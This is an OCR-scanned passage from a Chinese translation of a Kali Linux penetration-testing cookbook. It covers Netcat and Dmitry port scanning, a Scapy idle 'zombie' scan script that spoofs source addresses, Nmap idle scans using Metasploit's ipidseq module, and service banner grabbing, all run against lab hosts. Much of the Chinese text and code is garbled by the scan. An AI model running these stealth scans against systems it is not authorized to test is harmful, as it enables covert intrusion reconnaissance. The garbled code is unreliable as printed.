Host Name for 172.16.36.135 

Continuing with limited modules 
HostIP:172.16.36.135 

HostName: 


Gathered TCP Port information for 172.16.36.135 


Port State 
21/tcp open 
22/tcp open 
237 GD open 
25/tcp open 
537 ECP open 
80/tcp open 
111/tcp open 
139/tcp open 


Portscan Finished: Scanned 150 ports, 141 ports were in state cl 
osed 


工作 原理 


定义 如 何 执行 TCP 连接 扫描 的 底层 机 制 和 之 前 讨论 的 其 它 工具 一 样 。 和 其 他 工具 
相 比 ，Dmitry 的 使 用 性 主要 源 于 简洁 ， 并 不 需要 管理 多 个 配置 项 ， 像 我 们 使 用 
Nmap 和 Metasploit 那样 。 我 们 可 以 轻易 通过 指定 响应 模式 ， 以 及 将 IP. 地址 传递 
给 他 来 启动 Dmitry。 它 能 够 快 读 扫描 常用 的 150 个 端口 ， 以 及 其 中 所 有 开放 端口 的 


值 。 


Netcat TCP 端口 扫描 


由 于 Netcat 是 个 网 路 哦 套 接 字 连 接 和 管理 工具 ， 它 可 以 轻 甸 转换 为 TCP 端口 扫描 
工具 。 这 个 秘籍 展示 了 如 何 使 用 Netcat 执行 TCP 连接 扫描 。 


准备 

为 了 使 用 Netcat 执行 TCP 连接 扫描 ， 你 需要 一 个 运行 TCP 网 络 服务 的 远程 服务 
器 。 这 个 例子 中 我 们 使 用 Metasploitable2 实例 来 执行 任务 。 配 置 Metasploitable2 
的 更 多 信息 请 参考 第 一 章 中 的 “安装 Metasploitable2" 秘 籍 。 


操作 步骤 


Netcat 是 个 非常 易 用 ， 功 能 多 样 的 网 络 工具 ， 可 以 用 于 多 种 目的 。Netcat 的 一 种 非 
常 高 效 的 使 用 方式 就 是 执行 端口 扫描 。 为 了 确定 使 用 选项 ， nc 应 该 以 -h 选项 调 
用 ， 像 这 样 : 


root@KaliLinux:~# nc -h 
[v1.10-40] 
connect to somewhere: nc [-options] hostname port[s] [ports] 


listen for inbound: nc -l -p port [-options] [hostname] [port] 


options: 

-c shell commands as ^-e'; use /bin/sh to exec [dangerous!!] 

-e filename program to exec after connect [dangerous!!] 

-b allow broadcasts 

-g gateway source-routing hop point[s], up to 8 

-G num source-routing pointer: 4, 8, 12, 

-h this cruft 

-i secs delay interval for lines sent, ports scanned 

-k set keepalive option on socket 

-1 listen mode, for inbound connects 

-n numeric-only IP addresses, no DNS 

-o file hex dump of traffic -p port local port numb 
er 

-r randomize local and remote ports 

-q Secs quit after EOF on stdin and delay of secs 

-s addr local source address 

-T tos set Type Of Service 

-t answer TELNET negotiation 

-u UDP mode 

-V verbose [use twice to be more verbose] 

-W secs timeout for connects and final net reads 

-Z zero-I/O mode [used for scanning] 


port numbers can be individual or ranges: lo-hi [inclusive]; hyp 
hens in port names must be backslash escaped (e.g. 'ftp\-data'). 


正如 输出 所 表示 的 那样 ， -z 选项 可 以 高 效用 于 扫描 。 为 了 扫描 目标 系统 上 的 TCP 
80 端口 ， 我 们 使 用 -n 选项 来 表明 所 使 用 的 IP 地 址 ， -v 选项 用 于 详细 输 
出 ， -z 选项 用 于 扫描 ， 像 这 样 : 


root@KaliLinux:~# nc -nvz 172.16.36.135 80 

(UNKNOWN) [172.16.36.135] 80 (http) open 

root@KaliLinux:~# nc -nvz 172.16.36.135 443 

(UNKNOWN) [172.16.36.135] 443 (https) : Connection refused 


开放 端口 上 的 扫描 尝试 执行 
机 的 关闭 端口 执行 相同 扫描 会 
程 ， 像 这 样 : 


会 返回 IP 地 址 ， 端 口 地 址 ， 以 及 端口 状态 。 对 活动 主 
显 式 简 介 被 拒绝 。 我 们 可 以 在 寻 呼 哪 种 自动 化 这 个 过 


on 


root@KaliLinux:~# for x in $(seq 20 30); do nc -nvz 172.16.36.13 
5 $x; done 

(UNKNOWN) [172.16.36.135] 20 (ftp-data) : Connection refused 
(UNKNOWN) [172.16.36.135] 21 (ftp) open 

(UNKNOWN) [172.16.36.135] 22 (ssh) open 

(UNKNOWN) [172.16.36.135] 23 (telnet) open 

(UNKNOWN) [172.16.36.135] 24 (?) : Connection refused 
(UNKNOWN) [172.16.36.135] 25 (smtp) open 

(UNKNOWN) [172.16.36.135] 26 (?) : Connection refused 
(UNKNOWN) [172.16.36.135] 27 (?) : Connection refused 
(UNKNOWN) [172.16.36.135] 28 (?) : Connection refused 
(UNKNOWN) [172.16.36.135] 29 (?) : Connection refused 
(UNKNOWN) [172.16.36.135] 30 (?) : Connection refused 


通过 将 输出 传递 给 STDOUT ， 之 后 过 滤 输 出 ， 我 们 能 够 分 离 出 提供 开放 端口 细节 的 
行 。 我 们 甚至 可 以 更 加 简明 ， 通 过 仅仅 提取 我 们 需要 的 信息 。 如 果 单 个 主机 被 扫描 
了 ， 我 们 可 能 能 够 利用 第 三 和 第 四 个 字段 ; 


root@KaliLinux:~# for x in $(seq 20 30); do nc -nvz 172.16.36.13 
5 $x; done 2>&1 | grep open | cut -d " " -f 3-4 

21 (ftp) 

22 (ssh) 

23 (telnet) 

25 (smtp) 


通过 从 输出 提取 这 些 字段 ， cut 函数 可 以 用 于 以 空格 分 隔 符 ， 之 后 通过 指定 要 输 
出 的 字段 分 离 这 些 行 。 但 是 ， 还 有 另 一 种 高 效 的 方法 ， 就 是 在 Netcat 中 指定 端口 
范围 ， 而 不 需要 将 工具 传递 金 循环 中 。 通 过 向 nc 中 传 入 端口 地 址 值 的 序列 ， 
Netcat 会 自动 展示 其 中 的 开放 端口 : 


root@KaliLinux:~# nc 172.16.36.135 -nvz 20-30 
(UNKNOWN) [172.16.36.135] 25 (smtp) open 
(UNKNOWN) [172.16.36.135] 23 (telnet) open 
(UNKNOWN) [172.16.36.135] 22 (ssh) open 
(UNKNOWN) [172.16.36.135] 21 (ftp) open 


但 是 ， 像 之 前 那样 ， 我 们 需要 将 它 的 输出 传 给 STDOUT ， 以 便 将 其 传递 给 cut f 
数 。 通 过 展示 2 到 4 的 字段 ， 我 们 可 以 限制 IP 地 址 、 端 口号 以 及 相关 服务 的 输 
出 ， 像 这 样 : 


root@KaliLinux:~# nc 172.16.36.135 -nvz 20-30 2>&1 | cut -d " " 
-f 2-4 

[172.16.36.135] 25 (smtp) 

[172.16.36.135] 23 (telnet) 

[172.16.36.135] 22 (ssh) 

[172.16.36.135] 21 (ftp) 


我 们 可 以 在 bash 中 使 用 loop HA kiM Netcat 扫描 多 个 主机 地 址 序列 ， 之 后 提 
取 相 同 的 细节 来 确定 不 同 的 被 扫描 IP 地址 中 ， 哪 个 端口 是 开 着 的 。 


root@KaliLinux:~# for x in $(seq 0 255); do nc 172.16.36.$x -nvz 
80 2>&1 | grep open | cut -d " " -f 2-4; done 

[172.16.36.135] 80 (http) 

[172.16.36.180] 80 (http) 


工作 原理 


执行 TCP 连接 扫描 的 同居 通过 执行 完整 的 三 次 握手 ， 和 远程 系统 的 所 有 被 扫描 端 
口 建立 连接 。 端 口 的 状态 取决 于 连接 是 否 成 功 建立 。 如 果 连 接 建 立 ， 端 口 被 认为 是 
开放 的 ， 如 果 和 连接 不 能 成 功 建立 ， 端 口 被 认为 是 关闭 的 。 


3.15 Scapy 12 F 43 4 


我 们 可 以 识别 目标 系统 的 开放 端口 ， 而 不 留 下 和 系统 交互 的 证据。 这 种 机 器 隐蔽 的 
扫描 形式 就 是 僵尸 扫描 ， 并 且 只 能 在 网 络 中 存在 其 他 拥有 少量 网 络 服务 和 递增 IPID 
序列 的 主机 时 执行 。 这 个 秘籍 展示 了 如 何 使 用 Scapy 执行 僵尸 扫描 。 


准备 


为 了 使 用 Scapy 执行 僵尸 扫描 ， 你 需要 拥有 运行 TCP 服务 的 远程 系统 ， 以 及 另 一 
个 拥有 IPID 递增 序列 的 远程 系统 。 在 所 提供 的 例子 中 ，Metasploitable2 用 作 扫 描 
目标 ，WindowsXP 用 作 IPID 递增 的 僵尸 。 关 于 如 何在 本 地 实验 环境 下 配置 系统 的 
更 多 信息 ， 请 参考 第 一 章 的 “安装 Metasploitable2” 和 “安装 Windows 服务 器 "秘籍 。 
此 外 ， 这 一 节 也 需要 使 用 文本 编辑 器 将 脚本 写 到 文件 系统 ， 例 如 VIM 或 Nano。 如 
何 编写 脚本 的 更 多 信息 ， 请 参考 第 一 章 中 的 "使 用 文本 编辑 器 (VIM & Nano) "4% 


48° 


操作 步骤 


所 有 IP 封包 中 都 存在 的 值 是 ID 号 。 取 决 于 系统 ，ID 号 会 随机 生成 ， 可 能 始终 从 零 
开始 ， 或 者 可 能 在 每 个 发 送 的 P 封包 中 都 递增 1。 如果 发 现 了 |PID 递增 的 主机 ， 
并 且 这 个 主机 并 不 和 其 它 网 路 系统 交互 ， 它 就 可 以 用 作 识 别 其 它 系 统 上 开放 端口 的 
手段 。 我 们 可 以 通过 发 送 一 系列 IP 封包 ， 并 分 析 响 应 ， 来 识别 远程 系统 的 IPID 序 
列 模式 。 


>>> reply1 = sri(IP(dst="172.16.36.134")/TCP(flags="SA"), timeout 
=2,verbo se=0) 

>>> reply2 sri(IP(dst="172.16.36.134")/TCP(flags="SA"), timeout 
=2,verbo se=0) 

>>> reply1.display() 


HHH IP ]### 


version- 4L 
ihl- 5L 
tos= 0x0 
len= 40 
id= 61 
flags= 
frag- OL 
ttl= 128 
proto= tcp 
chksum- 0x9938 
src- 172.16.36.134 
dst- 172.16.36.180 
\options\ 
#HH#[ TCP ]### 
sport= http 
dport= ftp_data 
seq= 0 
ack- 0 
dataofs- 5L 
reserved- OL 
flags- R 
window- 0 
chksum- 0xe22 
urgptr- 0 
options- {} 
###[ Padding ]### 
load= '\x00\x00\x00\x00\x00\x00' 
>>> reply2.display() 
HHH IP ]### 
version= 4L 


ihl- 5L 
tos- 0x0 
len- 40 
id- 62 
flags- 
frag- OL 
ttl- 128 
proto- tcp 


chksum- 0x992d 
src- 172.16.36.134 
dst- 172.16.36.180 
\options\ 

###[ TCP ]### 
sport= http 
dport= ftp_data 
seq= 0 
ack- 0 
dataofs- 5L 
reserved- OL 
flags- R 
window- 0 
chksum- 0xe22 
urgptr- 0 


options- {} 
###[ Padding ]### 
load= '\x00\x00\x00\x00\x00\x00' 


如 果 我 们 向 Windows 独立 系统 发 送 两 个 IP 封包 ， 我 们 可 以 检测 响应 中 的 ID 属性 
的 整数 值 。 要 注意 第 一 个 请 求 的 回复 的 ID 是 61， 第 二 个 是 62。 这 个 主机 确实 存在 
递增 的 IPID 序列 ， 并 假设 它 保持 独立 。 它 可 以 用 作 高 效 的 僵尸 ， 来 进行 僵尸 扫 

描 。 为 了 执行 僵尸 扫描 ， 儿 须 向 僵尸 系统 发 送 初始 的 SYN+ACK 请 求 ， 来 判断 返回 
的 RST 中 的 当前 IPID 值 。 之 后 ， 向 扫描 目标 发 送 伪造 的 SYN 扫描 ， 带 有 僵尸 系 
统 的 P 原 地 址 。 如 果 端 口 是 打 开 的 ， 扫 描 目 标 会 发 送 SYN+ACK 响应 给 僵尸 。 由 
于 僵尸 没有 实际 发 送 初 始 的 SYN 请 求 ， 它 会 将 SYN+ACK 解释 为 来 路 不 明 ， 并 且 
项 目 表 发 送 RST 封包。 因此 将 IPID 增加 1。 有 最后， 应 该 向 僵尸 发 送 另 一 个 
SYN+ACK 封包 ， 它 会 返回 RST 封包 并 将 IPID 再 次 增加 1 ° IPID 比 起 初始 响应 增 
加 了 2， 折 表示 所 有 这 些 时 间 都 发 生 了 ， 并 且 被 扫描 系统 的 目标 端口 是 开放 的 。 


反之 ， 如 果 端 口 是 关闭 的 ， 会 发 生 不 同 的 系列 时 间 ， 这 仅仅 会 导致 最 后 的 RST! 
应 早 呢 更 加 1。 如 果 被 扫描 系统 的 目标 端口 是 关闭 的 ，RST 封包 会 发 给 僵尸 系统 ， 
作为 初始 的 伪造 的 SYN 封包 的 响应 。 由 于 RST 封包 没有 任何 回应 ， 人 和 僵尸 系统 的 
IPID 值 无 变化 。 所 以 ， 作 为 SYN+ACK 封包 的 响应 ， 返 回 给 扫描 系统 的 最 后 的 
RST 封包 的 IPID 值 只 会 增加 1。 


为 了 简化 这 个 过 程 ， 下 面 的 脚本 以 Python 编写 ， 它 能 识别 可 用 僵尸 系统 ， 也 对 提 
描 目标 执行 了 僵尸 扫描 。 


#!/usr/bin/python 

import logging 
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) 
from scapy.all import * 


def ipid(zombie): 

reply1 = sri(IP(dst=zombie)/TCP(flags="SA"),timeout=2, verbos 
e=0) 

send(IP(dst=zombie)/TCP(flags="SA"),verbose=0) 

reply2 = sri(IP(dst=zombie)/TCP(flags="SA"), timeout=2, verbos 
e=0) 

if reply2[IP].id == (reply1[IP].id + 2): 

print "IPID sequence is incremental and target appears t 


o be idle.  ZOMBIE LOCATED" 
response - raw input("Do you want to use this zombie to 
perform asscanes (Y or ND SS) 
if response == "Y": 
target - raw input("Enter the IP address of the targ 
et system: ") 
zombiescan(target,zombie) 
else: 
print "Either the IPID sequence is not incremental or th 
e target is not idle. NOT A GOOD ZOMBIE" 


def zombiescan(target, zombie): 
print "\nScanning target " + target + " with zombie " + zomb 


ie print "\n--------- Open Ports on Target-------- \n" 
for port in range(1,100): 
Erny: 

start val = sri(IP(dst-zombie)/TCP(flags-'SA",dport- 
port),tim eout=2, verbose=0) 

send(IP(src=zombie, dst=target )/TCP(flags="S", dport=p 
ort), verbose=0 ) 

end val = sri(IP(dst=zombie)/TCP(flags="SA"), timeout= 
2,verbo se-0) 

if end val[IP].id == (start val[IP].id + 2): 


print port 
except: 
pass 


print "----------- Zombie Scan Suite------------ An" 
print "1 - Identify Zombie Host\n" 
print "2 - Perform Zombie Scan\n" ans = raw input("Select an Opt 
ZO (aL or Zhe S 
if ans == "1": 
zombie = raw_input("Enter IP address to test IPID sequence: " 


) 
ipid(zombie) 
else: 
Üf ans == 12i: 
zombie = raw_input("Enter IP address for zombie system: " 
) 


target = raw_input("Enter IP address for scan target: ") 


zombiescan(target,zombie) 


O= = | 


在 执行 脚本 过 程 中 ， 用 户 会 收 到 量 个 选项 的 提示 。 通 过 选项 选项 1， 我们 可 以 扫描 
或 评估 目标 的 IPID 序列 来 判断 是 否 主 机 是 个 可 用 的 僵尸 。 假 设 主 机 是 独立 的 ， 并 
拥有 递增 的 PID 序列 ， 主 机 就 可 以 用 作 僵 尸 。 并 且 用 户 会 被 询问 是 否 使 用 僵尸 来 
执行 扫描 。 如 果 执 行 了 扫描 ， 会 对 TCP 端口 前 100 个 地 址 的 每 个 地 址 执行 前 面 讨 
论 的 过 程 。 像 这 样 : 


root@KaliLinux:~# ./zombie.py 
Te Zombie Scan Suite----------- 


1 - Identify Zombie Host 
2 - Perform Zombie Scan 


Select an Option (1 or 2): 1 

Enter IP address to test IPID sequence: 172.16.36.134 

IPID sequence is incremental and target appears to be idle. ZOM 
BIE LOCATED 

Do you want to use this zombie to perform a scan? (Y or N): Y 
Enter the IP address of the target system: 172.16.36.135 


Scanning target 172.16.36.135 with zombie 172.16.36.134 


工作 原理 


僵尸 扫描 是 个 枚 举目 标 系统 开放 端口 的 隐秘 方式 ， 不 需要 留 下 任何 交互 的 痕迹 。 将 
伪造 请 求 的 组 合 发 给 目标 系统 ， 以 及 将 正常 请 求 发 给 僵尸 系统 ， 我 们 就 可 以 通过 评 
估 僵 尸 系统 的 响应 的 IPID 值 来 映射 目标 系统 的 开放 端口 。 


3.18 Nmap 僵尸 扫描 


就 像 上 一 个 秘籍 ,在 编程 自 定 义 脚本 对 于 理解 僵尸 扫描 背后 的 工作 原理 很 有 帮助 。 
Nmap 中 还 有 另 一 种 高 效 的 扫描 模式 ， 可 以 用 于 执行 僵尸 扫描 。 这 个 秘籍 展示 了 如 
何 使 用 Nmap 执行 僵尸 扫描 。 


准备 


为 了 使 用 Nmap 执行 僵尸 扫描 ， 你 需要 拥有 运行 TCP 服务 的 远程 系统 ， 以 及 另 一 
个 拥有 IPID 递增 序列 的 远程 系统 。 在 所 提供 的 例子 中 ，Metasploitable2 用 作 扫 描 
目标 ，WindowsXP 用 作 IPID 递增 的 僵尸 。 关 于 如 何在 本 地 实验 环境 下 配置 系统 的 
更 多 信息 ， 请 参考 第 一 章 的 “安装 Metasploitable2” 和 “安装 Windows 服务 器 "秘籍 。 
此 外 ， 这 一 节 也 需要 使 用 文本 编辑 器 将 脚本 写 到 文件 系统 ， 例 如 VIM 或 Nano。 如 
何 编写 脚本 的 更 多 信息 ， 请 参考 第 一 章 中 的 "使 用 文本 编辑 器 (VIM 或 Nano) "$t 


AA 
i o 
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操作 步骤 


僵尸 扫描 可 以 在 Nmap 中 带 参 数 执行 。 但 是 ， 我 们 可 以 使 用 Metasploit 快速 发 现任 
何 可 用 的 僵尸 候选 项 ， 通 过 扫描 整个 地 址 范围 和 评估 PIPD 序列 ， 而 不 是 使 用 
Nmap 僵尸 扫描 。 为 了 这 样 做 ， 我 们 需要 使 用 msfconsole 命令 打开 Metasploit ， 
并 选项 IPID 序列 辅助 模块 ， 像 这 样 : 


root@KaliLinux:~# msfconsole 




















op rete he gt c cc amt icc eS PE EE E e ac + 
| METASPLOIT by Rapid7 | 
下 qu c c E + 
| | | 
| --c( (o( ( () | | nip em mim AER | 
| )=\ | | EXPLOIT \ | 
| // \\ a \ | 
| // NN | |==[msf >]============\ | 
| // \\ MT S 
| // RECON \\ | \(@)(@)(@)(@)(@)(@)(@)7 | 
| // \\ | 炎炎 火炎 火炎 火炎 火炎 炎炎 光大 大 炎炎 大 大 大 类 | 
Ps ie Ma es ee en ee + 
| 0 0 0 | SA | 
| o 0 | )======( | 
| o | LOOT '. | 
| |AAAAAAAAAAAAAA|]1 — | rel | N | 
| | PAYLOAD | eins E» ER M ES \ | 
d dM | zo) | | 
| |(9)(9)"""**|(9)(9)**|(Q) : " I | P | 
cM C ERE UK TU M ARUM E n 


Using notepad to track pentests? Have 


Metasploit Pro report on h 


osts, services, sessions and evidence -- type 'go pro' to launch 
it now. 
-[ metasploit v4.6.0-dev [core:4.6 api:1.0] 
+ -- --=[ 1053 exploits - 590 auxiliary - 174 post 
+ -- --z[ 275 payloads - 28 encoders - 8 nops 


msf > use auxiliary/scanner/ip/ipidseq 
auxiliary(ipidseq) > show options 


msf 


Module options (auxiliary/scanner/ip/ipidseq): 


Name 
INTERFACE 
ce 
RHOSTS 
e or CIDR identifier 
RPORT 80 
SNAPLEN 65535 
capture 
THREADS 1 
t threads 
TIMEOUT 500 


in milliseconds 


Current Setting Required Description 


The name of the interfa 
The target address rang 


The 
The 


target port 
number of bytes to 
The number of concurren 


The reply read timeout 


这 个 辅助 模块 可 以 用 于 在 主机 地 址 序列 或 网 络 范围 中 执行 扫描 ， 可 以 使 用 CIDR 72 
法 来 定义 。 aene 速度 增加 ， 我 们 可 以 将 THREADS 变量 设 为 合理 的 并 发 任务 
数量 ， 像 这 


msf auxiliary(ipidseq) > set RHOSTS 172.16.36.0/24 
RHOSTS -» 172.16.36.0/24 

msf auxiliary(ipidseq) > set THREADS 25 

THREADS -» 25 

msf auxiliary(ipidseq) > show options 


Module options (auxiliary/scanner/ip/ipidseq): 


Name Current Setting Required Description 
二 INTERFACE 
no The name of the interface 

RHOSTS 172.16.36.0/24 yes The target address rang 
e or CIDR identifier 

RPORT 80 yes The target port 

SNAPLEN 65535 yes The number of bytes to 
capture 

THREADS 25 yes The number of concurren 
t threads 

TIMEOUT 500 yes The reply read timeout 


in milliseconds 


一 旦 为 所 需 变 量 设置 了 合理 的 值 ， 我 们 可 以 使 用 show options 来 再 次 验证 扫描 
配置 。IPID 序列 扫描 之 后 可 以 使 用 run 命令 来 执行 。 


msf auxiliary(ipidseq) > run 


*] 172.16.36.1's IPID sequence class: Randomized 

*] 172.16.36.2's IPID sequence class: Incremental! 
*] Scanned 026 of 256 hosts (0109; complete) 

*] Scanned 052 of 256 hosts (0209; complete) 

*] Scanned 077 of 256 hosts (0309; complete) 

*] Scanned 103 of 256 hosts (0409; complete) 

*] Scanned 128 of 256 hosts (050% complete) 

*] 172.16.36.134's IPID sequence class: Incremental! 
*] 172.16.36.135's IPID sequence class: All zeros 

*] Scanned 154 of 256 hosts (0609; complete) 
*] Scanned 180 of 256 hosts (070% complete) 
*] Scanned 205 of 256 hosts (0809; complete) 
*] Scanned 231 of 256 hosts (090% complete) 
*] Scanned 256 of 256 hosts (100% complete) 
*] Auxiliary module execution completed 


SE ee ee Ree ee Ee eee es E ee ee aren eee 


由 于 IPID 序列 扫描 模块 会 遍历 所 提供 的 网 络 范 围 ， 它 会 识别 被 发 现 主机 的 IPID 序 
列 模式 ， 并 且 表 示 出 哪些 是 0， 随机 或 递增 的 。 RA 的 理想 候选 项 必须 拥 
有 递增 的 IPID， 并 且 不 会 被 网 络 上 的 其 它 主机 严重 影响 。 一 旦 识别 了 递增 的 独立 主 


机 ， 我 们 可 以 在 Nmap 中 使 用 -SI 选项 并 且 传 入 僵尸 主机 的 IP 地 址 来 执行 僵尸 扫 


描 。 


root@KaliLinux:~# nmap 172.16.36.135 -SI 172.16.36.134 -Pn -p 0- 
100 


Starting Nmap 6.25 ( http://nmap.org ) at 2014-01-26 14:05 CST I 
dle scan using zombie 172.16.36.134 (172.16.36.134:80); Class: I 
ncremental 

Nmap scan report for 172.16.36.135 

Host is up (0.045s latency). 

Not shown: 95 closed|filtered ports 

PORT STATE SERVICE 

21/tcp open ftp 

22/tcp open ssh 

23/tcp open telnet 

25/tcp open smtp 

53/tcp open domain 

80/tcp open 

http MAC Address: 00:0C:29:3D:84:32 (VMware) 


Nmap done: 1 IP address (1 host up) scanned in 2.75 seconds 


Ed d^ f| v > [E P d RITE da R Ate 172.16.36.135 的 前 100 A TCP 端口 

上 。 独 立 主 机 172.16.36.134 AEP > -Pn 选项 用 于 阻止 Nmap 尝试 ping 42 
描 目 标 。 这 个 示例 中 ， 我 们 识别 并 枚 举 了 所 有 列 出 的 开放 端口 ， 而 不 会 直接 和 被 扫 
描 主 机 交互 。 反 之 ， 伪 造 了 来 源 的 封包 会 发 给 扫描 目标 ， 并 且 只 有 扫描 系统 和 僵尸 
主机 之 间 才 有 直接 的 交互 。 


工作 原理 


僵尸 扫描 的 底层 机 制 和 上 一 个 秘籍 中 讨论 过 的 Scapy 的 例子 相同 。 但 是 ， 使 用 
Nmap 僵尸 扫描 模式 使 我 们 能 够 使 用 知名 的 集成 工具 来 快速 执行 此 类 工具 。 


大 大 


第 四 草 指纹 识别 


作者 : Justin Hutchens 
译 者 : 飞龙 
协议 : CC BY-NC-SA 4.0 


识别 目标 范围 上 的 活动 系统 ， 并 枚 举 这 些 系统 上 的 开放 端口 之 后 ， 重 要 的 是 开始 收 
集 关 于 它们 和 开放 端口 的 服务 的 信息 。 在 本 章 中 ， 我 们 会 讨论 用 于 Kali Linux 的 指 
纹 和 服务 识别 的 不 同 技 术 。 这 些 技术 将 包括 特征 抓 取 ， 服 务 探 测 识别 ， 操 作 系统 识 
别 ，SNMP 信息 收集 和 防火 墙 识 别 。 


4.1 Netcat 特征 抓 取 


Netcat 是 个 多 用 途 的 网 络 工具 ， 可 以 用 于 在 Kali 中 执行 多 个 信息 收集 和 扫描 任务 。 
这 个 秘籍 展示 了 如 何 使 用 Netcat 获取 服务 特征 ， 以 便 识 别 和 开放 端口 相关 的 服 
务 o 


在 讲解 上 述 特定 秘籍 之 前 ， 我 们 应 首先 了 解 一 些 将 在 本 章 剩余 部 分 讨论 的 基本 原 
则 。 本 章 中 的 每 个 秘籍 都 将 介绍 可 用 于 执行 几 个 特定 任务 的 工具 。 这 些 任 务 包括 
特征 抓 取 ， 服 务 识别 ， 操 作 系 统 识 别 ，SNMP 分 析 和 防火 墙 识 别 。 这 些 任务 中 的 
每 一 个 都 用 于 尽 可 能 多 地 收集 目标 系统 的 信息 ， 来 快速 有 效 地 攻击 该 系统 。 


准备 


为 了 使 用 Netcat 收集 服务 特征 ， 在 客户 端 设备 连接 时 ， 你 需要 拥有 运行 开放 信息 
的 网 络 服务 的 远程 系统 。 提 供 的 例子 使 用 了 Metasploitable2 来 执行 这 个 任务 。 配 
置 Metasploitable2 的 更 多 信息 ， 请 参考 第 一 章 的 “安装 Metasploitable2” 秘 籍 。 


在 尝试 识别 远程 服务 ， 以 及 投入 大 量 时 间 和 资源 之 前 ， 我 们 应 该 首先 确定 该 远程 服 
务 是 否 会 向 我 们 暴露 自己 。 服 务 特 征 包 括 与 远程 服务 建立 连接 时 立即 返回 的 输出 文 
本 。 过 去 用 于 网 络 服务 的 最 佳 实践 是 ， 发 现 制造 商 ， 软 件 名 称 ， 服 务 类 型 ， 甚 至 服 
务 特 征 中 的 版 本 号 。 幸 运 的 是 ， 对 于 渗透 测试 人 员 ， 这 些 信息 对 于 识别 软件 中 已 知 
的 弱点 ， 缺 陷 和 漏洞 非常 有 用 。 通 过 仅 连接 到 远程 终端 服务 ， 我 们 可 以 轻易 读 取 服 
务 特 征 。 但 是 ， 为 了 使 它 是 一 个 有 效 的 信息 收集 工具 ， 它 应 该 是 自动 的 ， 这 样 我 们 
不 必 手 动 连接 到 远程 主机 上 的 每 个 单独 的 服务 。 在 本 章 中 的 特征 抓 取 秘籍 中 讲解 的 
工具 ， 将 完成 自动 化 抓 取 特征 的 任务 ， 来 识别 尽 可 能 多 的 开放 服务 。 


如 果 远 程 服务 不 愿意 暴露 运行 它 的 软件 和 版 本 ， 我 们 需要 更 多 精力 来 识别 服务 。 通 
常 ， 我 们 可 以 识别 独特 的 行为 ， 或 请 求 用 于 精确 识别 服务 的 唯一 响应 。 其 至 可 以 根 
据 响应 或 行为 的 微妙 变化 而 识别 特定 服务 的 特定 版 本 。 然而 ， 所 有 这 些 独特 的 签名 
的 知识 ， 对 任何 人 来 说 都 很 困难 。 幸运 的 是 ， 许 多 工具 已 经 创建 ， 来 向 远程 服务 发 
送 大量 探 测 ， 来 分 析 这 些 目标 服务 的 响应 和 行为 。 与 之 相似 ， 响 应 变化 也 可 以 用 于 
识别 在 远程 服务 器 或 工作 站 上 运行 的 底层 操作 系统 。 这 些 工具 将 在 讲解 服务 识别 和 
操作 系统 识别 的 秘籍 中 讨论 。 


简单 网 络 管理 协议 (SNMP) 是 一 种 为 各 种 类 型 的 网 络 设备 提供 远程 管理 服务 的 协 
ii» SNMP 的 管理 功能 将 团体 字符 串 用 于 验证 来 执行 。 使 用 默认 团队 字符 串 部 署 
设备 是 非常 常见 的 。 当 发 生 这 种 情况 时 ， 攻 击 者 通常 可 能 远程 收集 目标 设备 配置 的 
大 量 信 息 ， 并 且 甚 至 在 某 些 情况 下 重新 配置 设备 。 利 用 SNMP 用 于 信息 收集 的 技 
术 会 在 讲解 SNMP 分 析 的 秘籍 中 讨论 。 


在 收集 关于 潜在 目标 的 信息 时 ， 重 要 的 是 ， 还 要 了 解 可 能 影响 成 功 侦查 或 攻击 的 任 
何 障 碍 。 防火 墙 是 一 个 网 络 设 备 或 软件 ， 用 于 选择 性 限制 发 往 或 来 自 特定 目标 的 网 
络 流量 。 防火 墙 通常 配置 为 防止 远程 访问 特定 服务 。 防火 墙 的 存在 修改 了 攻击 系 
统 和 目标 之 间 的 流量 ， 有 助 于 尝试 识别 绕 过 其 过 滤器 的 方法 。 识别 防火 墙 设 备 和 服 
务 的 技术 将 在 讲解 防火 墙 识别 的 秘籍 中 讨论 。 


操作 步骤 


为 了 使 用 Netcat 抓 取 服 务 特 征 ， 我 们 必须 与 建立 远程 系统 的 目标 端口 建立 套 接 字 
连接 。 为 了 快速 理解 Netcat 的 用 法 ， 以 及 如 何 用 于 该 目的 ， 我 们 可 以 输出 使 用 方 
法 。 这 可 以 使 用 -h 选项 来 完成 : 


root@KaliLinux:~# nc -h 
[v1.10-40] 
connect to somewhere: nc [-options] hostname port[s] [ports] 


listen for inbound: nc -l -p port [-options] [hostname] [port 
] 
options: 

-c shell commands as `-e'; use /bin/sh to exec [dangerous! ! ] 


-e filename program to exec after connect [dangerous!!] 

-b allow broadcasts 

-g gateway source-routing hop point[s], up to 8 

-G num source-routing pointer: 4, 8, 12, 

-h this cruft 

-i secs delay interval for lines sent, ports scanne 
d 

-k set keepalive option on socket 

-1 listen mode, for inbound connects 

-n numeric-only IP addresses, no DNS 

-o file hex dump of traffic 

-p port local port number 

-r randomize local and remote ports 

-q Secs quit after EOF on stdin and delay of secs 

-s addr local source address 

-T tos set Type Of Service 

-t answer TELNET negotiation 

-u UDP mode 

-V verbose [use twice to be more verbose] 

-W secs timeout for connects and final net reads 


-Z zero-I/O mode [used for scanning] 


通过 查看 工具 提供 的 多 个 选项 ， 我 们 可 以 判断 出 ， 通 过 指定 选项 ，IP 地 址 和 端口 
号 ， 我 们 就 可 以 创建 到 所 需 端口 的 连接 。 


root@KaliLinux:~# nc -vn 172.16.36.135 22 
(UNKNOWN) [172.16.36.135] 22 (ssh) open 
SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntut 

AC 


在 所 提供 的 例子 中 ， 创 建 了 到 Metasploitable2 系统 172.16.36.135 端口 22 的 
链接 。 -v 选项 用 于 提供 详细 输出 ， -n 选项 用 于 不 使 用 DNS 解析 来 连接 到 这 个 
IP 地 址 。 这 里 我 们 可 以 看 到 ， 远 程 主机 返回 的 特征 将 服务 识别 为 SSH， 厂 商 为 
OpenSSH ， 共 至 还 有 精确 的 版 本 4.7。Netcat 维护 开放 连接 ， 所 以 读 取 特征 之 后 ， 
你 可 以 按 下 Ctrl + c 来 强行 关闭 连接 。 


root@KaliLinux:~# nc -vn 172.16.36.135 21 
(UNKNOWN) [172.16.36.135] 21 (ftp) open 
220 (vsFTPd 2.3.4) 

^C 


通过 执行 相同 主机 21 端口 上 的 相似 扫描 ， 我 们 可 以 轻易 获得 所 运行 FTP 服务 的 服 
务 和 版 本 信息 。 每 个 情况 都 暴露 了 大 量 实用 的 信息 。 了 解 运 行 在 系统 上 的 服务 和 版 
